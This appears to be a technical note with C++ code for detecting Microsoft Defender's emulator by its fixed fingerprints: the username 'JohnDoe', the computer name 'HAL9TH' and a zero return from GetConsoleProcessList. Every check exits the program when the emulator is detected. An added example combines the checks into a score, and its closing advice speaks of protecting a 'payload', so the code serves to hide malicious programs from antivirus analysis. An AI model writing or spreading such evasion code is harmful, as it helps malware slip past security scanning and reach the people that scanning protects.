- Some Defender Emulator bypasses
- All code examples are in C++; I don't care for any other language.
The emulated version of GetUserName returns a static string of "JohnDoe".
You can bypass it with (note that GetUserNameA takes a pointer to an in/out DWORD size, and that a char array must be compared with strcmp, since == only compares pointers):
#include <windows.h>
#include <lmcons.h> // UNLEN
#include <cstring>
CHAR user[UNLEN + 1] = {};
DWORD size = UNLEN + 1; // in: buffer size, out: characters written
GetUserNameA(user, &size);
if(strcmp(user, "JohnDoe") == 0){
ExitProcess(1);// Emulated, unless the actual username is JohnDoe
}
Since the username could actually be JohnDoe, it is worth adding an extra check before bailing out.
The emulated version of GetComputerName returns a static string of "HAL9TH".
CHAR host[MAX_COMPUTERNAME_LENGTH + 1] = {};
DWORD size = MAX_COMPUTERNAME_LENGTH + 1; // in/out size, same as GetUserNameA
GetComputerNameA(host, &size);
if(strcmp(host, "HAL9TH") == 0){
ExitProcess(1);// Emulated
}
The emulated version of GetConsoleProcessList simply returns 0. https://docs.microsoft.com/en-us/windows/console/getconsoleprocesslist states that "If the return value is zero, the function has failed, because every console has at least one process associated with it." The first parameter is a pointer to a DWORD array that receives the process IDs, so pass a real buffer rather than an integer. Caveat: the call also returns 0 on a real machine when the calling process has no console attached (for example a GUI-subsystem binary), so only treat 0 as a signal when you know a console exists.
DWORD pids[16];
if(GetConsoleProcessList(pids, 16) == 0){
// could be emulated, or the process simply has no console
}
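Putting the three checks together, as an added example that is not part of the original note: rather than exiting on any single match, the decision is made on how many of the fingerprints agree, which removes the "real user called JohnDoe" and "no console attached" false positives discussed above. The Win32 collection code (including the assumption that GetConsoleWindow() is a good enough test for an attached console) is compiled only on Windows; the scoring logic is plain C++ so it can be exercised with constructed values on any platform. The function and struct names are mine, not from the note.

```cpp
// Added example (not from the original note): combine the Defender emulator
// fingerprints and decide on the combination, not on any single one.
#include <cstring>
#include <string>

#ifdef _WIN32
#include <windows.h>
#include <lmcons.h>   // UNLEN
#endif

// Values the emulator hands back, per the note above.
static const char* kEmulatedUser = "JohnDoe";
static const char* kEmulatedHost = "HAL9TH";

// Snapshot of the environment as seen by the current process.
struct HostFingerprint {
    std::string user;
    std::string host;
    bool        hasConsole;    // whether a console is attached (assumption: caller determines this)
    unsigned    consoleProcs;  // return value of GetConsoleProcessList, 0 on failure
};

// Count how many observations match the emulator. One match can be a
// coincidence (a real JohnDoe, a GUI process without a console); two or
// more are unlikely outside the emulator.
int emulatorScore(const HostFingerprint& fp) {
    int score = 0;
    if (std::strcmp(fp.user.c_str(), kEmulatedUser) == 0) ++score;
    if (std::strcmp(fp.host.c_str(), kEmulatedHost) == 0) ++score;
    // Only meaningful when a console is attached; without one the call
    // also returns 0 on a real machine.
    if (fp.hasConsole && fp.consoleProcs == 0) ++score;
    return score;
}

bool looksEmulated(const HostFingerprint& fp) {
    return emulatorScore(fp) >= 2;
}

#ifdef _WIN32
// Gather the fingerprint with the correct Win32 signatures: both name
// functions take a pointer to an in/out DWORD size, not the size by value.
HostFingerprint collectFingerprint() {
    HostFingerprint fp{};
    char  user[UNLEN + 1] = {};
    DWORD userLen = sizeof(user);
    if (GetUserNameA(user, &userLen)) fp.user = user;

    char  host[MAX_COMPUTERNAME_LENGTH + 1] = {};
    DWORD hostLen = sizeof(host);
    if (GetComputerNameA(host, &hostLen)) fp.host = host;

    // Assumption: a non-NULL console window means a console is attached.
    fp.hasConsole = GetConsoleWindow() != NULL;
    DWORD pids[16];
    fp.consoleProcs = GetConsoleProcessList(pids, 16);
    return fp;
}

int main() {
    HostFingerprint fp = collectFingerprint();
    if (looksEmulated(fp)) ExitProcess(1);  // emulated: bail out quietly
    return 0;
}
#endif
```

The threshold of two is a judgement call: raise it to three if you would rather miss the emulator than exit on a real host, lower it if the payload is cheap to lose.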